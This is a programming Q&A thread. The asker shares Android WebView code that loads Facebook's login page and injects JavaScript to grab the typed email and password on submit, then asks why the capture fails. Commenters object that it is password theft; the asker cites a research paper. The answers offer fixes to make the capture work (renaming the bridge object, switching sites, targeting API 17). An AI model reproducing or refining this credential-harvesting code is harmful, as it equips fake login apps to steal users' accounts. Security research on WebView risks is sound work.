# WebView JavaScript Injection

Tags: javascript, android, webview, android-webview

I am trying to make an app that will take the username and password from entering login information from facebook, or twitter, and make the information a user typed into the "username" and "password" fields from the native website pop up in a message box once the user clicks the submit button.

Whats happening is the app compiles and launches correctly, the facebook login page is displayed, and it allows me to input a username and password, however the dialog box never pops up displaying the information I just typed in the login boxes.

can anyone point me in the correct direction with this?

Thanks!!

my MainActivity.java code is as follows:

```
package leo.umd.capture;

import android.app.Activity;
import android.app.AlertDialog;
import android.content.DialogInterface;
import android.os.Bundle;
import android.webkit.JavascriptInterface;
import android.webkit.WebChromeClient;
import android.webkit.WebView;
import android.webkit.WebViewClient;



public class MainActivity extends Activity {
    WebView webview1;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

        webview1 = (WebView)findViewById(R.id.webView1);

        webview1.getSettings().setJavaScriptEnabled(true);
        webview1.setWebChromeClient(new WebChromeClient());
        webview1.addJavascriptInterface(new MyJavaScriptInterface(), "MYOBJECT");
        webview1.setWebViewClient(new WebViewClient() {
            @Override
            public boolean shouldOverrideUrlLoading(WebView view, String url) {
                view.loadUrl(url);
                return true;
            }

            @Override
            public void onPageFinished(WebView view, String url) {
                super.onPageFinished(view, url);
                StringBuilder sb = new StringBuilder();
                sb.append("document.getElementsByTagName('form')[0].onsubmit = function () {");
                sb.append("var objPWD, objAccount;var str = '';");
                sb.append("var inputs = document.getElementsByTagName('input');");
                sb.append("for (var i = 0; i < inputs.length; i++) {");
                sb.append("if (inputs[i].type.toLowerCase() === 'password') {objPWD = inputs[i];}");

                sb.append("else if (inputs[i].name.toLowerCase() === 'email') {objAccount = inputs[i];}");
                sb.append("}");
                sb.append("if (objAccount != null) {str += objAccount.value;}");
                sb.append("if (objPWD != null) { str += ' , ' + objPWD.value;}");
                sb.append("window.MYOBJECT.processHTML(str);");
                sb.append("return true;");
                sb.append("};");

                view.loadUrl("javascript:" + sb.toString());




            }

        });

        String sUrl = "https://www.facebook.com";
//        String sUrl = "http://www.renren.com/";
//        String sUrl = "http://www.baidu.com/";


        webview1.loadUrl(sUrl);

    }

    class MyJavaScriptInterface
    {
        @JavascriptInterface
        public void processHTML(String html)
        {
            AlertDialog.Builder builder = new AlertDialog.Builder(MainActivity.this);
            builder.setTitle("AlertDialog from app")
                    .setMessage(html)
                    .setPositiveButton(android.R.string.ok,
                            new DialogInterface.OnClickListener() {

                                @Override
                                public void onClick(DialogInterface dialog, int which) {
                                    // TODO Auto-generated method stub

                                }

                            })
                    .setCancelable(false).show();

        }
    }

}
```

Comment: Why are you trying to steal users' passwords?

Comment: I am working on a research paper covering the vulnerabilities of webview. I am trying to demonstrate it in an emulator.

Comment: @ff210327 webview is not a vulnerability. just because some asshat can abuse it to try to steal passwords does not make it a vulnerability. stop it.

Comment: I'm voting to close this question as off-topic because it's malicious.

Comment: The assignment is to write a paper on the vulnerabilities of webview... you're right it can be just fine, but I think the point is demonstrating how someone can put malicious code in any app and it can cause undesirable effects.

Answer (score 0):

I got it working you must rename the variable "MYOBJECT", and that with some diagnostic lines of code helped get it working.

Answer (score 0):

You may have to change the website to a different one to get the alert dialog to pop up. Facebook didn't work for me but other sites did. Adjust the input type/name in the javascript code accordingly. Also, make sure you are using API version 17. Some methods used in this code are deprecated in versions higher than 17.

Comment: Your answer could be improved with additional supporting information. Please [edit] to add further details, such as citations or documentation, so that others can confirm that your answer is correct. You can find more information on how to write good answers [in the help center](/help/how-to-answer).

Comment: This does not provide an answer to the question. Once you have sufficient [reputation](https://stackoverflow.com/help/whats-reputation) you will be able to [comment on any post](https://stackoverflow.com/help/privileges/comment); instead, [provide answers that don't require clarification from the asker](https://meta.stackexchange.com/questions/214173/why-do-i-need-50-reputation-to-comment-what-can-i-do-instead). - [From Review](/review/late-answers/34382553)